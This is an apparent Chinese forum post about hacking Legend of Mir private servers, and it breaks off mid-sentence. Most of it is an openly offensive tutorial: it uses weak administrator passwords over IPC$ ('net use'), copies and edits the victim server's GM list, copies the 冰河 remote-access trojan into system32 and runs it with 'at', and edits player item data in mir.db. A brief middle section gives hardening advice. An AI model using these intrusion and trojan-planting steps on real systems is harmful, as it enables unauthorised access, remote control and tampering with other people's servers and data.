前几天，本私服也同样遭受过黑客的攻击！但是研究了几次发现了漏洞的所在！

　　下面我先写如何入侵计算机的，我用的是WINDOWS 2000 SEVER

　　1 X-SCAN扫描IP 看看谁是弱口令（IP也非常容易得到，私服都有，弱口令就是用户名和密码都是系统默认的，没有改。）

　　2 打开DOS系统 在DOS下进行*作！

　　c:/>net use \\192.168.0.1\ipc$ /user:administrator 进入对方计算机USER进入的就是管理员用户。

　　进入了以后就好办了，可以找你要黑的私服！做GM也好，搞破坏删除也好，比如做GM吧！

　　c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令，可以看出来，其余的想怎么改就凭你了，但是我得解释一下！！这段代码目的很简单就是将D盘拷贝一个传奇GM的列表，你可以把你自己添加进去在编辑！

　　c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt

　　这样就可以了。这是利用弱口令进入计算机的方法！！当然了还有更多的方法。

　　我在讲讲我的 ** 传奇的遭黑的经历！

　　首先，就是鼠标乱动，很明显就是被人控制了，分析如下：1，中木马，2远程控制！

　　其次，有文件覆盖的对话框，计算机被突然重新启动！！分析如下：1，破坏系统，2，对传奇的控制！3，从新启动是为了黑客的设置生效！

　　再次，有非法GM制造物品，以被查出。分析如下：是针对传奇而来！

　　解决办法：用杀毒软件杀毒，最好在DOS下进行！2，是2000的漏洞太多，查找无用的端口，并关闭3389等，下载 2000 SP3 的补丁！在控制面板中选本地用户和组中关闭GUEST帐号！和 IUSR （计算机名）INTNERNET来宾帐号关闭（我的传奇就是黑客利用这个号进入计算机的），修改超级管理员用户名与密码！ 在关闭远程访问等功能，另外，进攻传奇主要是GM列表，我同样也中过，现象是这样的，打开AdminList.txt文件，没有发现多的GM，利用CTRL-A看看有没有多余的GM，另外仔细一看，在看AdminList.TXT的文件名后面有没有空格，设置文件全部显示，会发现是否多了一个隐藏GM列表文件，这也是屡进不止的发现有非法GM的原因.黑客进攻我的计算机是用了2个小时就被我发现了，立即做了相应的修改，恢复了传奇的正常运行，至今为止，仍然有人进入我的来宾帐号的警告，但是已经进不来了！传奇也步入了正常的运行当中！

　　虽然我写了一些如何进攻和防御计算机的方法和解决办法，我自己也觉得有点自相矛盾的想法，但是我的目的很是简单，希望能够帮助你解决你的问题！提高自己计算机的安全

　　如何在别人的私服做GM?


　　攻击初级教学

　　我在侵入别人4f所使用的方法

　　看到有些4f做的不错，但是进去又不是很有钱，也没装备，高手也很多，一直不喜欢在里面当菜鸟的我，一口气进入他们的服务器端大闹一番之后。当足了gm的瘾，现在我把方法公布与大家。。。。
　
　　其实我所使用的方法很简单，只有４个工具：
　
　　（一）：shed.exe

　　（二）流光2000

　　（三）cmd.exe (其实就是２０００下的dos啦)！
　
　　（四）冰河8.4 操作系统：win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的，速度快，可以查到很多服务断的共项文件，不过在这里面有些ｉｐ在浏览器中无法访问，这是因为其中也包含了个人上网的ｉｐ．呵呵！一些作网站，网吧的服务器一些目录都是共享的，有些是可以访问，但是不能删除，因为你所访问的都是以匿名访问的，所以权限不够！有些需要密码。遇到密码怎办？用流光！ “流光”虽说对202作了限制，但是对小日本的ip可是没有限制的，呵呵！所以说使用流光的ipc探测，建立一个空对话，查到用户列表，然后先简单探测，此时有些网管懒惰，把administrator设置的过于简单，呵呵，你就可以抓到了。
　
　　下一步如何做呢？也许在你查对方的端口时发现对方开的端口很少，比如ftp没开，怎办呢？冰河！ “冰河”，想必许多朋友都玩过，使用冰河控制一台服务器速度很快，（因为服务器那边带宽很大）几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢？ “cmd.exe” 是２０００下的ｄｏｓ了，执行cmd.exe 使用net命令，
　　具体操作如下： 　
　　第一步：net use \\ip\ipc$　“password” /user:”user” 说明：以一个超级用户名与你想黑的网站建立联接，当然超级用户必须是该网站admin里的。这里的”ip”就是主机了，“password”就是超级用户的密码，“user”就是超级用户。比如：net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie

　　第二步：copy g-server.exe \\ip\admin$\system32 说明：g-server.exe就是冰河的远程服务器端。意义：将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧，呵呵！装了防火墙估计可以，不过很多主机没钱买呀！不像中国盗版满天飞！如果你有最新的木马也可以的！这是最好的了！！嘿嘿……

　　第三步：net time \\ip 察看对方的服务器时间。由于有时差，应该是一个小时吧！所以必须要以对方的服务器时间为准。

　　第四步：at \\ip time g-server.exe 这里的time就是对方的主机时间。作用：在规定时间执行该程序。比如　at \\210.248.250.2 19:55 g-server.exe 第五步：冰河就可以控制该电脑了。这个我就不说了吧，呵呵！菜鸟也会玩的软件。

　　这时我们就可以控制服务器了，

　　net use * \\ip\*$ 远程映射

　　看这个


　　mir.db里面有每个人的数据，并且没加密的，大家可以用

　　access找开来改一下，改几个极品，如0-80攻的木剑啊，0-50魔的六角戒指之类的，那就随你的便了。只是这样也太烦人了。呵呵。

　　比如武器，数据格式如下（全部是16进制）

　　** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a

　　前面**的是物品代码，然后0xce 00 是武器代码(高位在后)，和物品db数据库中对应，

　　例：物品数据库中屠龙是序号（idx）是205，对应到这里就是（205+1）转为16进制是ce

　　后面的 43 12是当前持久度，88 13是最大持久度。

　　例：43 12换算成十进制为17170，持久度为17

　　后面的01 02 03依次是攻击、魔法、道术。

　　注意是在原武基础上增加。

　　例：上面的屠龙显示出来是攻击：5-36，道